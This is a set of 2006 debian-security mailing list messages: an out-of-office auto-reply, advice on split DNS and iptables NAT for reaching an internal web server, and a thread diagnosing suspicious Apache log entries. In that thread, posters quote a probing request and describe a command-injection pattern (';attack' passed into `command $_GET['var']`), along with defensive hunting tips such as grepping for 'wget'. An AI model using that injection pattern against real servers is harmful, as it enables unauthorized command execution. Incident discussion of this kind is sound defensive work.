Re: [SECURITY] [DSA 963-1] New mydns packages fix denial of service
Hei, Olen työmatkalla ulkomailla 1.1.2006-6.1.2006 välisenä aikana ja palaan töihin 7.1.2006. Kiireellisissä työasioissa ota yhteyttä Jorma Laajamäkeen, [EMAIL PROTECTED] tai GSM 0400-585 835. Terveisin Erno Räsänen -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
RE: Weird message in my apache error log
We have a match. See: 66.232.140.73 - - [31/Jan/2006:07:29:58 +0100] "GET http:///prxjdg.cgi?ja HTTP/1.0" 404 331 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" Where the http address maps to an apparently compromised server where these people have installed some kind of proxy (proxy judge ?) > I've seen this type of thing with PHP; I was going to say something but I > figured I would wait since you didn't mention it. Can you correlate the > time/date/ip with the request from access.log? It might give you more > information. I can say, that we get attacked regularly on Sarge and we're a > relatively high volume site with the similar specs, and I've not seen > anything like this as a standard hack - my experience is that this is most > often caused by not filtering/validating forms, global PHP variables, or PHP > scripting errors. I am very curious to know what's going on. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: getting to www servers from inside where they have an Internal IP
also sprach Yves Junqueira <[EMAIL PROTECTED]> [2006.02.01.1712 +0100]: > Bind9 implements "views". It can provide different resolutions to > the same domain for different networks/hosts. "bind9 view" is the > way to go, I guess. most nameservers do, but yes, this is what I meant. This, or a second nameserver. -- Please do not send copies of list mail to me; I read the list! .''`. martin f. krafft <[EMAIL PROTECTED]> : :' :proud Debian developer and author: http://debiansystem.info `. `'` `- Debian - when you have better things to do than fixing a system Invalid/expired PGP (sub)keys? Use subkeys.pgp.net as keyserver! "the less you know about computers the more you want micro$oft!" -- micro$oft ad campaign, circa 1996 (proof that micro$oft's advertising _isn't_ dishonest!) signature.asc Description: Digital signature (GPG/PGP)
Re: getting to www servers from inside where they have an Internal IP
2006/1/29, martin f krafft <[EMAIL PROTECTED]>: > This is hardly a topic for debian-security but anyway... > > also sprach hanasaki <[EMAIL PROTECTED]> [2006.01.29.1945 +0100]: > > What iptable rule can be put on the firewall so that internal port 80 > > traffic going to the external NIC on port 80 comes back to the internal > > webserver on port ? > > None that I know. I suggest using a second nameserver to resolve the > A record to the internal IP. > Bind9 implements "views". It can provide different resolutions to the same domain for different networks/hosts. "bind9 view" is the way to go, I guess. -- Yves Junqueira http://www.cetico.org Brasília, Brasil
Re: getting to www servers from inside where they have an Internal IP
martin f krafft <[EMAIL PROTECTED]> wrote: > None that I know. I suggest using a second nameserver to resolve the > A record to the internal IP. "split brain dns" Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: getting to www servers from inside where they have an Internal IP
Michelle Konzack wrote: Am 2006-01-29 12:45:09, schrieb hanasaki: The goal is to have an internal webserver: - DONE - running on a high numbered port - DONE - firewall forwards 80-> on webserver - DONE - external hits on www.blah.com served by the httpserver - - internal/intranet also can hit the webserver as www.blah.com The problem is that www.blah.com resolves to the external internet IP and then gets routed out of the firewall which does not come back in and This is a problem with DNS-Loop-Back. Please search google for it. The solution is, to add an entry for the Webserver to your /etc/hosts. Greetings Michelle Konzack Systemadministrator Tamay Dogan Network Debian GNU/Linux Consultant If everything is on the same LAN using the same firewall you can do like this to route the packets correctly: Note I placed commonly known ip's in here -- not ours -- just so you have something to ref. # NAT into individual hosts; firewalled by FORWARD rules defined in this configuration earlier (not included in this snippet). # Prerouting -d is the public IP of the webserver --to-dest IP is the private IP address of said server. -A PREROUTING -d 128.101.101.101 -j DNAT --to-dest 192.168.2.2 # Fix up NAT from internal hosts # postrouting -s is LAN subnet, -d is LAN IP of web server --to-source is IP of gateway (firewall) -A POSTROUTING -s 192.168.2.0/24 -d 192.168.2.2/32 -p tcp -m tcp --dport 80 -j SNAT --to-source 192.168.2.254 Hope this helps! Matt -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
RE: Weird message in my apache error log
I've seen this type of thing with PHP; I was going to say something but I
figured I would wait since you didn't mention it. Can you correlate the
time/date/ip with the request from access.log? It might give you more
information. I can say, that we get attacked regularly on Sarge and we're a
relatively high volume site with the similar specs, and I've not seen
anything like this as a standard hack - my experience is that this is most
often caused by not filtering/validating forms, global PHP variables, or PHP
scripting errors. I am very curious to know what's going on.
> -Original Message-
> From: Josep Serrano [mailto:[EMAIL PROTECTED]
> Sent: Wednesday, February 01, 2006 4:53 AM
> To: debian-security@lists.debian.org
> Subject: RE: Weird message in my apache error log
>
> Hello guys,
>
> No, I can't think of any specific application. Yes this web server is
> running a
> couple of php scripts but that's it.
>
> Following your recommendations I have installed mod_security with the set
> of
> standard rules provided in www.modsecurity.org. I will be following up the
> audit log
> for any clues.
>
> Be sure that I have strange files, permissions, or open ports in this box.
> I run
> daily checks and I got the vaccines :-)
>
> Thanks,
> Josep SERRANO.
>
> > What does your application do? It looks like it is finding a shell
> script
> > somewhere? We've seen similar things when executing CGI's and not
> filtering
> > the input data so well. The line 22, 24 make me think there is a script
> > somewhere rather than arbitrary GET data.
> >
> >> -Original Message-
> >> Looks like someone is trying to do arbritary commmand execution. You
> >> probably have a script somewhere that says `command $_GET['var']`, and
> >> someone is passing ';attack' as var, but it isn't quite working.
> >>
> >> I suggest using the audit log feature of mod_security, or just grepping
> >> through your access logs for anything odd ('wget' is a good search
> >> term).
> >>
> >> You might have a bot on the system, check for any odd network
> >> connections, especially to port 6667 (IRC). Also look for www-data
> owned
> >> files in /tmp.
>
>
>
> --
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact
> [EMAIL PROTECTED]
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: getting to www servers from inside where they have an Internal IP
Am 2006-01-29 12:45:09, schrieb hanasaki: > The goal is to have an internal webserver: > - DONE - running on a high numbered port > - DONE - firewall forwards 80-> on webserver > - DONE - external hits on www.blah.com > served by the httpserver > - - internal/intranet also can hit > the webserver as www.blah.com > > The problem is that www.blah.com resolves to the external internet IP > and then gets routed out of the firewall which does not come back in and This is a problem with DNS-Loop-Back. Please search google for it. The solution is, to add an entry for the Webserver to your /etc/hosts. Greetings Michelle Konzack Systemadministrator Tamay Dogan Network Debian GNU/Linux Consultant -- Linux-User #280138 with the Linux Counter, http://counter.li.org/ # Debian GNU/Linux Consultant # Michelle Konzack Apt. 917 ICQ #328449886 50, rue de Soultz MSM LinuxMichi 0033/3/8845235667100 Strasbourg/France IRC #Debian (irc.icq.com) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
RE: Weird message in my apache error log
Hello guys,
No, I can't think of any specific application. Yes this web server is running a
couple of php scripts but that's it.
Following your recommendations I have installed mod_security with the set of
standard rules provided in www.modsecurity.org. I will be following up the
audit log
for any clues.
Be sure that I have strange files, permissions, or open ports in this box. I run
daily checks and I got the vaccines :-)
Thanks,
Josep SERRANO.
> What does your application do? It looks like it is finding a shell script
> somewhere? We've seen similar things when executing CGI's and not filtering
> the input data so well. The line 22, 24 make me think there is a script
> somewhere rather than arbitrary GET data.
>
>> -Original Message-
>> Looks like someone is trying to do arbritary commmand execution. You
>> probably have a script somewhere that says `command $_GET['var']`, and
>> someone is passing ';attack' as var, but it isn't quite working.
>>
>> I suggest using the audit log feature of mod_security, or just grepping
>> through your access logs for anything odd ('wget' is a good search
>> term).
>>
>> You might have a bot on the system, check for any odd network
>> connections, especially to port 6667 (IRC). Also look for www-data owned
>> files in /tmp.
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
